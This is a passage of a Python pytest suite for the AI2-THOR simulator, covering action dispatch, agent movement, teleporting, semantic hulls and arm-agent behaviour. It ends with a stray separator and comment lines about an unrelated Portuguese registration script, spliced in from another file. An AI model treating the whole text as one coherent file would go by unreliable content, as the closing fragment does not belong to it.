            "TestActionDispatchSAAmbig2",
            "ProcessControlCommand",
        ]
    )
    assert sorted(event.metadata["actionReturn"]) == known_ambig
    skip_reset(fifo_controller)
def test_action_dispatch_find_ambiguous_stochastic(fifo_controller):
    """The stochastic agent must report the same set of ambiguous actions."""
    event = fifo_controller.step(
        dict(action="TestActionDispatchFindAmbiguous"),
        typeName="UnityStandardAssets.Characters.FirstPerson.StochasticRemoteFPSAgentController",
    )
    known_ambig = sorted(
        [
            "TestActionDispatchSAAmbig",
            "TestActionDispatchSAAmbig2",
            "ProcessControlCommand",
        ]
    )
    assert sorted(event.metadata["actionReturn"]) == known_ambig
    skip_reset(fifo_controller)
def test_action_dispatch_server_action_ambiguous2(fifo_controller):
    """Same-class signature clashes must raise a descriptive ValueError."""
    exception_thrown = False
    exception_message = None
    try:
        fifo_controller.step("TestActionDispatchSAAmbig2")
    except ValueError as e:
        exception_thrown = True
        exception_message = str(e)
    assert exception_thrown
    assert (
        "Ambiguous action: TestActionDispatchSAAmbig2 Signature match found in the same class"
        == exception_message
    )
    skip_reset(fifo_controller)
def test_action_dispatch_server_action_ambiguous(fifo_controller):
    """Mixing ServerAction methods with overloads must raise a ValueError."""
    exception_thrown = False
    exception_message = None
    try:
        fifo_controller.step("TestActionDispatchSAAmbig")
    except ValueError as e:
        exception_thrown = True
        exception_message = str(e)
    assert exception_thrown
    assert (
        exception_message
        == "Ambiguous action: TestActionDispatchSAAmbig Mixing a ServerAction method with overloaded methods is not permitted"
    )
    skip_reset(fifo_controller)
def test_action_dispatch_find_conflicts_stochastic(fifo_controller):
    """The stochastic agent must report the known parameter conflicts."""
    event = fifo_controller.step(
        dict(action="TestActionDispatchFindConflicts"),
        typeName="UnityStandardAssets.Characters.FirstPerson.StochasticRemoteFPSAgentController",
    )
    known_conflicts = {
        "TestActionDispatchConflict": ["param22"],
    }
    assert event.metadata["actionReturn"] == known_conflicts
    skip_reset(fifo_controller)
def test_action_dispatch_find_conflicts_physics(fifo_controller):
    """The physics agent must report the known parameter conflicts."""
    event = fifo_controller.step(
        dict(action="TestActionDispatchFindConflicts"),
        typeName="UnityStandardAssets.Characters.FirstPerson.PhysicsRemoteFPSAgentController",
    )
    known_conflicts = {
        "TestActionDispatchConflict": ["param22"],
    }
    # NOTE(review): this variant reads _raw_metadata while the stochastic one
    # reads metadata directly — presumably intentional, but confirm.
    assert event.metadata._raw_metadata["actionReturn"] == known_conflicts
    skip_reset(fifo_controller)
def test_action_dispatch_missing_args(fifo_controller):
    """Omitting required parameters must raise and set errorCode MissingArguments."""
    caught_exception = False
    try:
        event = fifo_controller.step(
            dict(action="TestActionDispatchNoop", param6="foo")
        )
        print(event.metadata["actionReturn"])
    except ValueError as e:
        caught_exception = True
    assert caught_exception
    assert fifo_controller.last_event.metadata["errorCode"] == "MissingArguments"
    skip_reset(fifo_controller)
def test_action_dispatch_invalid_action(fifo_controller):
    """Unknown action names must raise and set errorCode InvalidAction."""
    caught_exception = False
    try:
        event = fifo_controller.step(dict(action="TestActionDispatchNoopFoo"))
    except ValueError as e:
        caught_exception = True
    assert caught_exception
    assert fifo_controller.last_event.metadata["errorCode"] == "InvalidAction"
    skip_reset(fifo_controller)
def test_action_dispatch_empty(fifo_controller):
    """Dispatch with no parameters selects the zero-arg overload."""
    event = fifo_controller.step(dict(action="TestActionDispatchNoop"))
    assert event.metadata["actionReturn"] == "emptyargs"
    skip_reset(fifo_controller)
def test_action_disptatch_one_param(fifo_controller):
    """Dispatch selects the single-parameter overload when one arg is given."""
    event = fifo_controller.step(dict(action="TestActionDispatchNoop", param1=True))
    assert event.metadata["actionReturn"] == "param1"
    skip_reset(fifo_controller)
def test_action_disptatch_two_param(fifo_controller):
    """Dispatch selects the two-parameter overload when both args are given."""
    event = fifo_controller.step(
        dict(action="TestActionDispatchNoop", param1=True, param2=False)
    )
    assert event.metadata["actionReturn"] == "param1 param2"
    skip_reset(fifo_controller)
def test_action_disptatch_two_param_with_default(fifo_controller):
    """An explicitly passed value overrides a defaulted parameter."""
    event = fifo_controller.step(
        dict(action="TestActionDispatchNoop2", param3=True, param4="foobar")
    )
    assert event.metadata["actionReturn"] == "param3 param4/default foobar"
    skip_reset(fifo_controller)
def test_action_disptatch_two_param_with_default_empty(fifo_controller):
    """An omitted defaulted parameter falls back to its default value."""
    event = fifo_controller.step(dict(action="TestActionDispatchNoop2", param3=True))
    assert event.metadata["actionReturn"] == "param3 param4/default foo"
    skip_reset(fifo_controller)
def test_action_disptatch_serveraction_default(fifo_controller):
    """A ServerAction-style method dispatches with no extra args."""
    event = fifo_controller.step(dict(action="TestActionDispatchNoopServerAction"))
    assert event.metadata["actionReturn"] == "serveraction"
    skip_reset(fifo_controller)
def test_action_disptatch_serveraction_with_object_id(fifo_controller):
    """A ServerAction-style method accepts an objectId parameter."""
    event = fifo_controller.step(
        dict(action="TestActionDispatchNoopServerAction", objectId="candle|1|2|3")
    )
    assert event.metadata["actionReturn"] == "serveraction"
    skip_reset(fifo_controller)
def test_action_disptatch_all_default(fifo_controller):
    """A method whose parameters all have defaults dispatches with no args."""
    event = fifo_controller.step(dict(action="TestActionDispatchNoopAllDefault"))
    assert event.metadata["actionReturn"] == "alldefault"
    skip_reset(fifo_controller)
def test_action_disptatch_some_default(fifo_controller):
    """Passing a subset of defaulted params still dispatches correctly."""
    event = fifo_controller.step(
        dict(action="TestActionDispatchNoopAllDefault2", param12=9.0)
    )
    assert event.metadata["actionReturn"] == "somedefault"
    skip_reset(fifo_controller)
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_moveahead(controller):
    """MoveAhead advances the agent one grid step (+0.25 z) from the base pose."""
    teleport_to_base_location(controller)
    controller.step(dict(action="MoveAhead"), raise_for_failure=True)
    position = controller.last_event.metadata["agent"]["position"]
    assert_near(position, dict(x=-1.5, z=-1.25, y=0.901))
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_moveback(controller):
    """MoveBack retreats the agent one grid step (-0.25 z)."""
    teleport_to_base_location(controller)
    controller.step(dict(action="MoveBack"), raise_for_failure=True)
    position = controller.last_event.metadata["agent"]["position"]
    assert_near(position, dict(x=-1.5, z=-1.75, y=0.900998652))
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_moveleft(controller):
    """MoveLeft strafes the agent one grid step (-0.25 x)."""
    teleport_to_base_location(controller)
    controller.step(dict(action="MoveLeft"), raise_for_failure=True)
    position = controller.last_event.metadata["agent"]["position"]
    assert_near(position, dict(x=-1.75, z=-1.5, y=0.901))
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_moveright(controller):
    """MoveRight strafes the agent one grid step (+0.25 x)."""
    teleport_to_base_location(controller)
    controller.step(dict(action="MoveRight"), raise_for_failure=True)
    position = controller.last_event.metadata["agent"]["position"]
    assert_near(position, dict(x=-1.25, z=-1.5, y=0.901))
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_moveahead_mag(controller):
    """moveMagnitude overrides the default grid step (here 0.5 meters)."""
    teleport_to_base_location(controller)
    controller.step(dict(action="MoveAhead", moveMagnitude=0.5), raise_for_failure=True)
    position = controller.last_event.metadata["agent"]["position"]
    assert_near(position, dict(x=-1.5, z=-1, y=0.9009983))
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_moveahead_fail(controller):
    """Moving 5 meters from the base pose must collide and fail."""
    teleport_to_base_location(controller)
    controller.step(dict(action="MoveAhead", moveMagnitude=5.0))
    assert not controller.last_event.metadata["lastActionSuccess"]
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_jsonschema_metadata(controller):
    """Event metadata must validate against the checked-in JSON schema."""
    event = controller.step(dict(action="Pass"))
    with open(os.path.join(TESTS_DATA_DIR, "metadata-schema.json")) as f:
        schema = json.loads(f.read())
    jsonschema.validate(instance=event.metadata, schema=schema)
    skip_reset(controller)
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_arm_jsonschema_metadata(controller):
    """Arm-agent metadata must validate against the arm JSON schema."""
    controller.reset(agentMode="arm")
    event = controller.step(action="Pass")
    with open(os.path.join(TESTS_DATA_DIR, "arm-metadata-schema.json")) as f:
        schema = json.loads(f.read())
    jsonschema.validate(instance=event.metadata, schema=schema)
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_get_scenes_in_build(controller):
    """Every scene checked into unity/Assets/Scenes must be in the build."""
    expected = {
        os.path.splitext(os.path.basename(path))[0]
        for path in glob.glob("unity/Assets/Scenes/*.unity")
    }
    event = controller.step(dict(action="GetScenesInBuild"), raise_for_failure=True)
    returned = set(event.metadata["actionReturn"])
    # the build may contain extra (private) scenes; none may be missing
    missing = expected - returned
    assert len(missing) == 0, "scenes in build diff: %s" % missing
    skip_reset(controller)
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_get_reachable_positions(controller):
    """GetReachablePositions must expose positions via both actionReturn and
    the transient reachablePositions metadata key, and that key must NOT be
    readable on subsequent events."""
    event = controller.step("GetReachablePositions")
    assert (
        event.metadata["actionReturn"] == event.metadata["reachablePositions"]
    ), "reachablePositions should map to actionReturn!"
    assert len(event.metadata["reachablePositions"]) > 0 and isinstance(
        event.metadata["reachablePositions"], list
    ), "reachablePositions/actionReturn should not be empty after calling GetReachablePositions!"
    assert "reachablePositions" not in event.metadata.keys()
    event = controller.step("Pass")
    # BUG FIX: the original wrapped both the lookup AND an `assert False` in a
    # bare `except:`, so the AssertionError was swallowed and this check could
    # never fail.  Probe first, then assert outside the try block.
    try:
        event.metadata["reachablePositions"]
        leaked = True
    except Exception:
        # any lookup failure means the key is (correctly) unavailable
        leaked = False
    assert (
        not leaked
    ), "reachablePositions shouldn't be available without calling action='GetReachablePositions'."
# Test for Issue: 477
def test_change_resolution_image_synthesis(fifo_controller):
    """ChangeResolution must resize depth/instance/semantic frames, and
    resizing back must reproduce the original frames and color mappings."""
    fifo_controller.reset(
        TEST_SCENE,
        width=300,
        height=300,
        renderInstanceSegmentation=True,
        renderDepthImage=True,
        renderSemanticSegmentation=True,
    )
    fifo_controller.step("RotateRight")
    # snapshot all synthesized frames at 300x300
    first_event = fifo_controller.last_event
    first_depth_frame = fifo_controller.last_event.depth_frame
    first_instance_frame = fifo_controller.last_event.instance_segmentation_frame
    first_sem_frame = fifo_controller.last_event.semantic_segmentation_frame
    event = fifo_controller.step(action="ChangeResolution", x=500, y=500)
    assert event.depth_frame.shape == (500, 500)
    assert event.instance_segmentation_frame.shape == (500, 500, 3)
    assert event.semantic_segmentation_frame.shape == (500, 500, 3)
    event = fifo_controller.step(action="ChangeResolution", x=300, y=300)
    assert event.depth_frame.shape == (300, 300)
    assert event.instance_segmentation_frame.shape == (300, 300, 3)
    assert event.semantic_segmentation_frame.shape == (300, 300, 3)
    # after resizing back, synthesized output must match the snapshot
    assert np.allclose(event.depth_frame, first_depth_frame, atol=0.001)
    assert np.array_equal(event.instance_segmentation_frame, first_instance_frame)
    assert np.array_equal(event.semantic_segmentation_frame, first_sem_frame)
    assert first_event.color_to_object_id == event.color_to_object_id
    assert first_event.object_id_to_color == event.object_id_to_color
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_change_resolution(controller):
    """ChangeResolution must resize the RGB frame and report the new size."""
    event = controller.step(dict(action="Pass"), raise_for_failure=True)
    assert event.frame.shape == (300, 300, 3)
    event = controller.step(
        dict(action="ChangeResolution", x=400, y=400), raise_for_failure=True
    )
    assert event.frame.shape == (400, 400, 3)
    assert (event.screen_width, event.screen_height) == (400, 400)
    # restore the default resolution for subsequent tests
    event = controller.step(
        dict(action="ChangeResolution", x=300, y=300), raise_for_failure=True
    )
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_teleport(controller):
    """Exercise Teleport/TeleportFull across agent modes.

    Fixes over the previous version:
    - the out-of-bounds loop hardcoded action="TeleportFull", so the loop
      variable was unused and "Teleport" was never exercised;
    - the `try: step(...); assert False, ... except: pass` pattern swallowed
      its own AssertionError (a bare except catches it), so the
      expected-failure checks could never fail; `pytest.raises` is used
      instead;
    - `!= None` replaced with `is not None`.
    """
    # Checking y coordinate adjustment works
    controller.step(
        "TeleportFull", **{**BASE_FP28_LOCATION, "y": 0.95}, raise_for_failure=True
    )
    position = controller.last_event.metadata["agent"]["position"]
    assert_near(position, BASE_FP28_POSITION)
    controller.step(
        "TeleportFull",
        **{**BASE_FP28_LOCATION, "x": -2.0, "z": -2.5, "y": 0.95},
        raise_for_failure=True,
    )
    position = controller.last_event.metadata["agent"]["position"]
    assert_near(position, dict(x=-2.0, z=-2.5, y=0.901))
    # Teleporting too high
    before_position = controller.last_event.metadata["agent"]["position"]
    controller.step(
        "Teleport", **{**BASE_FP28_LOCATION, "y": 1.0},
    )
    assert not controller.last_event.metadata[
        "lastActionSuccess"
    ], "Teleport should not allow changes for more than 0.05 in the y coordinate."
    assert (
        controller.last_event.metadata["agent"]["position"] == before_position
    ), "After failed teleport, the agent's position should not change."
    # Teleporting into an object
    controller.step(
        "Teleport", **{**BASE_FP28_LOCATION, "z": -3.5},
    )
    assert not controller.last_event.metadata[
        "lastActionSuccess"
    ], "Should not be able to teleport into an object."
    # Teleporting into a wall
    controller.step(
        "Teleport", **{**BASE_FP28_LOCATION, "z": 0},
    )
    assert not controller.last_event.metadata[
        "lastActionSuccess"
    ], "Should not be able to teleport into a wall."
    # DEFAULT AGENT TEST
    # make sure Teleport works with default args
    a1 = controller.last_event.metadata["agent"]
    a2 = controller.step("Teleport", horizon=10).metadata["agent"]
    assert abs(a2["cameraHorizon"] - 10) < 1e-2, "cameraHorizon should be ~10!"
    # all should be the same except for horizon
    assert_near(a1["position"], a2["position"])
    assert_near(a1["rotation"], a2["rotation"])
    assert (
        a1["isStanding"] == a2["isStanding"]
    ), "Agent should remain in same standing when unspecified!"
    assert a1["isStanding"] is not None, "Agent isStanding should be set for physics agent!"
    # make sure float rotation works
    # TODO: readd this when it actually works
    # agent = controller.step('TeleportFull', rotation=25).metadata['agent']
    # assert_near(agent['rotation']['y'], 25)
    # test out of bounds with default agent (now actually tests both actions)
    for action in ["Teleport", "TeleportFull"]:
        with pytest.raises(Exception):
            controller.step(
                action=action,
                position=dict(x=2000, y=0, z=9000),
                rotation=dict(x=0, y=90, z=0),
                horizon=30,
                raise_for_failure=True,
            )
    # Teleporting with the locobot and drone, which don't support standing
    for agent in ["locobot", "drone"]:
        event = controller.reset(agentMode=agent)
        assert event.metadata["agent"]["isStanding"] is None, agent + " cannot stand!"
        # Only degrees of freedom on the locobot
        for action in ["Teleport", "TeleportFull"]:
            event = controller.step(
                action=action,
                position=dict(x=-1.5, y=0.9, z=-1.5),
                rotation=dict(x=0, y=90, z=0),
                horizon=30,
            )
            assert event.metadata["lastActionSuccess"], (
                agent + " must be able to TeleportFull without passing in standing!"
            )
            # standing is unsupported for these agents: the step must raise
            with pytest.raises(Exception):
                controller.step(
                    action=action,
                    position=dict(x=-1.5, y=0.9, z=-1.5),
                    rotation=dict(x=0, y=90, z=0),
                    horizon=30,
                    standing=True,
                )
            # test out of bounds with this agent
            with pytest.raises(Exception):
                controller.step(
                    action=action,
                    position=dict(x=2000, y=0, z=9000),
                    rotation=dict(x=0, y=90, z=0),
                    horizon=30,
                    raise_for_failure=True,
                )
        # make sure Teleport works with default args
        a1 = controller.last_event.metadata["agent"]
        a2 = controller.step("Teleport", horizon=10).metadata["agent"]
        assert abs(a2["cameraHorizon"] - 10) < 1e-2, "cameraHorizon should be ~10!"
        # all should be the same except for horizon
        assert_near(a1["position"], a2["position"])
        assert_near(a1["rotation"], a2["rotation"])
        # TODO: readd this when it actually works.
        # make sure float rotation works
        # if agent == "locobot":
        #     agent = controller.step('TeleportFull', rotation=25).metadata['agent']
        #     assert_near(agent['rotation']['y'], 25)
    controller.reset(agentMode="default")
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_get_interactable_poses(controller):
    """GetInteractablePoses: pose counts, teleporting into a returned pose,
    occluded objects, maxPoses, horizon/rotation filters and maxDistance.

    Fix: the failure messages "Not expecting horizon/rotation: " previously
    concatenated str + float, which would raise TypeError instead of showing
    the assertion message; they now use f-strings.
    """
    fridgeId = next(
        obj["objectId"]
        for obj in controller.last_event.metadata["objects"]
        if obj["objectType"] == "Fridge"
    )
    event = controller.step("GetInteractablePoses", objectId=fridgeId)
    poses = event.metadata["actionReturn"]
    assert (
        600 > len(poses) > 400
    ), "Should have around 400 interactable poses next to the fridge!"
    # teleport to a random pose
    pose = poses[len(poses) // 2]
    event = controller.step("TeleportFull", **pose)
    # assumes 1 fridge in the scene
    fridge = next(
        obj
        for obj in controller.last_event.metadata["objects"]
        if obj["objectType"] == "Fridge"
    )
    assert fridge["visible"], "Object is not interactable!"
    # tests that teleport correctly works with **syntax
    assert (
        abs(pose["x"] - event.metadata["agent"]["position"]["x"]) < 1e-3
    ), "Agent x position off!"
    assert (
        abs(pose["z"] - event.metadata["agent"]["position"]["z"]) < 1e-3
    ), "Agent z position off!"
    assert (
        abs(pose["rotation"] - event.metadata["agent"]["rotation"]["y"]) < 1e-3
    ), "Agent rotation off!"
    assert (
        abs(pose["horizon"] - event.metadata["agent"]["cameraHorizon"]) < 1e-3
    ), "Agent horizon off!"
    assert (
        pose["standing"] == event.metadata["agent"]["isStanding"]
    ), "Agent's isStanding is off!"
    # potato should be inside of the fridge (and, thus, non interactable)
    potatoId = next(
        obj["objectId"]
        for obj in controller.last_event.metadata["objects"]
        if obj["objectType"] == "Potato"
    )
    event = controller.step("GetInteractablePoses", objectId=potatoId)
    assert (
        len(event.metadata["actionReturn"]) == 0
    ), "Potato is inside of fridge, and thus, shouldn't be interactable"
    assert event.metadata[
        "lastActionSuccess"
    ], "GetInteractablePoses with Potato shouldn't have failed!"
    # assertion for maxPoses
    event = controller.step("GetInteractablePoses", objectId=fridgeId, maxPoses=50)
    assert len(event.metadata["actionReturn"]) == 50, "maxPoses should be capped at 50!"
    # assert only checking certain horizons and rotations is working correctly
    horizons = [0, 30]
    rotations = [0, 45]
    event = controller.step(
        "GetInteractablePoses",
        objectId=fridgeId,
        horizons=horizons,
        rotations=rotations,
    )
    for pose in event.metadata["actionReturn"]:
        horizon_works = False
        for horizon in horizons:
            if abs(pose["horizon"] - horizon) < 1e-3:
                horizon_works = True
                break
        # f-string here: the old str + float concatenation raised TypeError
        assert horizon_works, f"Not expecting horizon: {pose['horizon']}"
        rotation_works = False
        for rotation in rotations:
            if abs(pose["rotation"] - rotation) < 1e-3:
                rotation_works = True
                break
        assert rotation_works, f"Not expecting rotation: {pose['rotation']}"
    # assert only checking certain horizons and rotations is working correctly
    event = controller.step("GetInteractablePoses", objectId=fridgeId, rotations=[270])
    assert (
        len(event.metadata["actionReturn"]) == 0
    ), "Fridge shouldn't be viewable from this rotation!"
    assert event.metadata[
        "lastActionSuccess"
    ], "GetInteractablePoses with Fridge shouldn't have failed!"
    # test maxDistance
    event = controller.step("GetInteractablePoses", objectId=fridgeId, maxDistance=5)
    assert (
        1300 > len(event.metadata["actionReturn"]) > 1100
    ), "GetInteractablePoses with large maxDistance is off!"
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_2d_semantic_hulls(controller):
    """Get2DSemanticHull(s): pin scene objects to fixed poses, query hulls
    (all / by type / by id / single id) and compare against stored ground
    truth using a symmetric-difference-area tolerance."""
    from shapely.geometry import Polygon
    controller.reset("FloorPlan28")
    obj_name_to_obj_id = {
        o["name"]: o["objectId"] for o in controller.last_event.metadata["objects"]
    }
    # Used to save fixed object locations.
    # with open("ai2thor/tests/data/floorplan28-fixed-obj-poses.json", "w") as f:
    #     json.dump(
    #         [
    #             {k: o[k] for k in ["name", "position", "rotation"]}
    #             for o in controller.last_event.metadata["objects"]
    #         ],
    #         f
    #     )
    # Pin every object to a recorded pose so hulls are deterministic.
    with open("ai2thor/tests/data/floorplan28-fixed-obj-poses.json", "r") as f:
        fixed_obj_poses = json.load(f)
    for o in fixed_obj_poses:
        teleport_success = controller.step(
            "TeleportObject",
            objectId=obj_name_to_obj_id[o["name"]],
            position=o["position"],
            rotation=o["rotation"],
            forceAction=True,
            forceKinematic=True,
            makeUnbreakable=True,
        ).metadata["lastActionSuccess"]
        assert teleport_success
    object_types = ["Tomato", "Drawer", "Fridge"]
    object_ids = [
        "Mug|-03.15|+00.82|-03.47",
        "Faucet|-00.39|+00.93|-03.61",
        "StoveBurner|-00.22|+00.92|-01.85",
    ]
    def get_rounded_hulls(**kwargs):
        """Query hulls (single-object form when 'objectId' given) and round
        coordinates to 4 decimals for stable comparison."""
        if "objectId" in kwargs:
            md = controller.step("Get2DSemanticHull", **kwargs).metadata
        else:
            md = controller.step("Get2DSemanticHulls", **kwargs).metadata
        assert md["lastActionSuccess"] and md["errorMessage"] == ""
        hulls = md["actionReturn"]
        if isinstance(hulls, list):
            return np.array(hulls, dtype=float).round(4).tolist()
        else:
            # multi-object form returns {objectId: hull}
            return {
                k: np.array(v, dtype=float).round(4).tolist()
                for k, v in md["actionReturn"].items()
            }
    # All objects
    hulls_all = get_rounded_hulls()
    # Filtering by object types
    hulls_type_filtered = get_rounded_hulls(objectTypes=object_types)
    # Filtering by object ids
    hulls_id_filtered = get_rounded_hulls(objectIds=object_ids)
    # Single object id
    hulls_single_object = get_rounded_hulls(objectId=object_ids[0])
    # Used to save the ground truth values:
    # objects = controller.last_event.metadata["objects"]
    # objects_poses = [
    #     {"objectName": o["name"], "position": o["position"], "rotation": o["rotation"]} for o in objects
    # ]
    # print(controller.step("SetObjectPoses", objectPoses=objects_poses).metadata)
    # with open("ai2thor/tests/data/semantic-2d-hulls.json", "w") as f:
    #     json.dump(
    #         {
    #             "all": hulls_all,
    #             "type_filtered": hulls_type_filtered,
    #             "id_filtered": hulls_id_filtered,
    #             "single_object": hulls_single_object,
    #         },
    #         f
    #     )
    with open("ai2thor/tests/data/semantic-2d-hulls.json") as f:
        truth = json.load(f)
    def assert_almost_equal(a, b):
        """Lists are compared as polygons (relative symmetric-difference
        area); dicts are compared recursively key by key."""
        if isinstance(a, list):
            pa = Polygon(a)
            pb = Polygon(b)
            pa_area = pa.area
            pb_area = pb.area
            sym_diff_area = pa.symmetric_difference(pb).area
            # TODO: There seems to be a difference in the geometry reported by Unity when in
            # Linux vs Mac. I've had to increase the below check to the relatively generous <0.02
            # to get this test to pass.
            assert sym_diff_area / max([1e-6, pa_area, pb_area]) < 2e-2, (
                f"Polygons have to large an area ({sym_diff_area}) in their symmetric difference"
                f" compared to their sizes ({pa_area}, {pb_area}). Hulls:\n"
                f"{json.dumps(a)}\n"
                f"{json.dumps(b)}\n"
            )
        else:
            for k in set(a.keys()) | set(b.keys()):
                try:
                    assert_almost_equal(a[k], b[k])
                except AssertionError as e:
                    # prefix the failing key so nested failures are locatable
                    raise AssertionError(f"For {k}: {e.args[0]}")
    assert_almost_equal(truth["all"], hulls_all)
    assert_almost_equal(truth["type_filtered"], hulls_type_filtered)
    assert_almost_equal(truth["id_filtered"], hulls_id_filtered)
    assert_almost_equal(truth["single_object"], hulls_single_object)
    # Should fail when given types and ids
    assert not controller.step(
        "Get2DSemanticHulls", objectTypes=object_types, objectIds=object_ids
    ).metadata["lastActionSuccess"]
@pytest.mark.parametrize("controller", fifo_wsgi)
@pytest.mark.skip(reason="Colliders need to be moved closer to objects.")
def test_get_object_in_frame(controller):
    """GetObjectInFrame: spot-check a few (x, y) screen queries from a fixed
    pose, then exhaustively verify every eroded instance-mask pixel maps back
    to its object id."""
    controller.reset(scene=TEST_SCENE, agentMode="default")
    event = controller.step(
        action="TeleportFull",
        position=dict(x=-1, y=0.900998235, z=-1.25),
        rotation=dict(x=0, y=90, z=0),
        horizon=0,
        standing=True,
    )
    assert event, "TeleportFull should have succeeded!"
    query = controller.step("GetObjectInFrame", x=0.6, y=0.6)
    assert not query, "x=0.6, y=0.6 should fail!"
    query = controller.step("GetObjectInFrame", x=0.6, y=0.4)
    assert query.metadata["actionReturn"].startswith(
        "Cabinet"
    ), "x=0.6, y=0.4 should have a cabinet!"
    query = controller.step("GetObjectInFrame", x=0.3, y=0.5)
    assert query.metadata["actionReturn"].startswith(
        "Fridge"
    ), "x=0.3, y=0.5 should have a fridge!"
    event = controller.reset(renderInstanceSegmentation=True)
    assert event.metadata["screenHeight"] == 300
    assert event.metadata["screenWidth"] == 300
    # exhaustive test
    num_tested = 0
    for objectId in event.instance_masks.keys():
        for obj in event.metadata["objects"]:
            if obj["objectId"] == objectId:
                break
        else:
            # object may not be a sim object (e.g., ceiling, floor, wall, etc.)
            continue
        num_tested += 1
        mask = event.instance_masks[objectId]
        # subtract 3 pixels off the edge due to pixels being rounded and collider issues
        mask = Image.fromarray(mask)
        for _ in range(3):
            mask_edges = mask.filter(ImageFilter.FIND_EDGES)
            mask = ImageChops.subtract(mask, mask_edges)
        mask = np.array(mask)
        ys, xs = mask.nonzero()
        # every remaining interior pixel must resolve to this object
        for x, y in zip(xs, ys):
            event = controller.step(
                action="GetObjectInFrame", x=x / 300, y=y / 300, forceAction=True
            )
            assert (
                event.metadata["actionReturn"] == objectId
            ), f"Failed at ({x / 300}, {y / 300}) for {objectId} with agent at: {event.metadata['agent']}"
    assert (
        num_tested == 29
    ), "There should be 29 objects in the frame, based on the agent's pose!"
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_get_coordinate_from_raycast(controller):
    """GetCoordinateFromRaycast: out-of-range screen coordinates must fail,
    and in-view coordinates must return known world-space hit points from a
    fixed agent pose."""
    controller.reset(scene="FloorPlan28")
    event = controller.step(
        action="TeleportFull",
        position=dict(x=-1.5, y=0.900998235, z=-1.5),
        rotation=dict(x=0, y=90, z=0),
        horizon=0,
        standing=True,
    )
    assert event, "TeleportFull should have succeeded!"
    # screen coordinates outside [0, 1] are invalid
    for x, y in [(1.5, 0.5), (1.1, 0.3), (-0.1, 0.8), (-0.5, -0.3)]:
        query = controller.step("GetCoordinateFromRaycast", x=x, y=y)
        assert not query, f"x={x}, y={y} should fail!"
    query = controller.step("GetCoordinateFromRaycast", x=0.5, y=0.5)
    assert_near(
        query.metadata["actionReturn"],
        {"x": -0.344259053, "y": 1.57599819, "z": -1.49999917},
    )
    query = controller.step("GetCoordinateFromRaycast", x=0.5, y=0.2)
    assert_near(
        query.metadata["actionReturn"],
        {"x": -0.344259053, "y": 2.2694428, "z": -1.49999917},
    )
    query = controller.step("GetCoordinateFromRaycast", x=0.25, y=0.5)
    assert_near(
        query.metadata["actionReturn"],
        {"x": -0.5968407392501831, "y": 1.5759981870651245, "z": -1.0484200716018677},
    )
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_get_reachable_positions_with_directions_relative_agent(controller):
    """GetReachablePositions is grid-aligned by default (count unchanged by
    agent rotation) but must produce a different set when
    directionsRelativeAgent=True and the agent is rotated off-axis."""
    controller.reset("FloorPlan28")
    event = controller.step("GetReachablePositions")
    num_reachable_aligned = len(event.metadata["actionReturn"])
    assert 100 < num_reachable_aligned < 125
    # rotate the agent to a non-axis-aligned heading
    controller.step(
        action="TeleportFull",
        position=dict(x=-1, y=0.900998235, z=-1.25),
        rotation=dict(x=0, y=49.11111, z=0),
        horizon=0,
        standing=True,
    )
    event = controller.step("GetReachablePositions")
    num_reachable_aligned_after_teleport = len(event.metadata["actionReturn"])
    assert num_reachable_aligned == num_reachable_aligned_after_teleport
    event = controller.step("GetReachablePositions", directionsRelativeAgent=True)
    num_reachable_unaligned = len(event.metadata["actionReturn"])
    assert 100 < num_reachable_unaligned < 125
    assert (
        num_reachable_unaligned != num_reachable_aligned
    ), "Number of reachable positions should differ when using `directionsRelativeAgent`"
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_manipulathor_move(controller):
    """MoveAgent (arm agent): ahead/right offsets must land on the expected
    world position from the known spawn point."""
    event = controller.reset(scene="FloorPlan28", agentMode="arm")
    assert_near(
        point1={"x": -1.5, "y": 0.9009982347488403, "z": -1.5},
        point2=event.metadata["agent"]["position"],
    )
    event = controller.step(action="MoveAgent", ahead=0.25, right=0.15)
    assert_near(
        point1={"x": -1.649999976158142, "y": 0.9009982347488403, "z": -1.75},
        point2=event.metadata["agent"]["position"],
    )
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_manipulathor_rotate(controller):
    """RotateAgent (arm agent): a 60-degree rotation from the 180-degree spawn
    heading must yield 240 degrees."""
    event = controller.reset(scene="FloorPlan28", agentMode="arm")
    assert_near(
        point1={"x": -0.0, "y": 180.0, "z": 0.0},
        point2=event.metadata["agent"]["rotation"],
    )
    event = controller.step(action="RotateAgent", degrees=60)
    assert_near(
        point1={"x": -0.0, "y": 240.0, "z": 0.0},
        point2=event.metadata["agent"]["rotation"],
    )
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_unsupported_manipulathor(controller):
    """With agentMode='arm' the discrete move/rotate actions and both
    PickupObject forms must fail."""
    controller.reset(agentMode="arm")
    unsupported_actions = [
        "MoveAhead",
        "MoveBack",
        "MoveLeft",
        "MoveRight",
        "RotateRight",
        "RotateLeft",
    ]
    for action in unsupported_actions:
        event = controller.step(action)
        assert not event, action + " should have failed with agentMode=arm"
    event = controller.step(action="PickupObject", x=0.5, y=0.5)
    assert not event, "PickupObject(x, y) should have failed with agentMode=arm"
    # NOTE(review): this reads metadata from the event of the FAILED step above;
    # it works because failed events still carry scene metadata, but a
    # successful no-op step would make the intent clearer.
    objectId = next(
        obj["objectId"] for obj in event.metadata["objects"] if obj["pickupable"]
    )
    event = controller.step(action="PickupObject", objectId=objectId, forceAction=True)
    assert not event, "PickupObject(objectId) should have failed with agentMode=arm"
|
# People-registration script: read name/sex/age in a loop, then report the
# total count, the average age, the registered women and everyone at or
# above the average age. (User-facing strings are intentionally Portuguese.)
# Fix: f'{p['nome']}' nested the same quote type inside an f-string, which is
# a SyntaxError on Python < 3.12 (PEP 701 only allows it from 3.12 on).
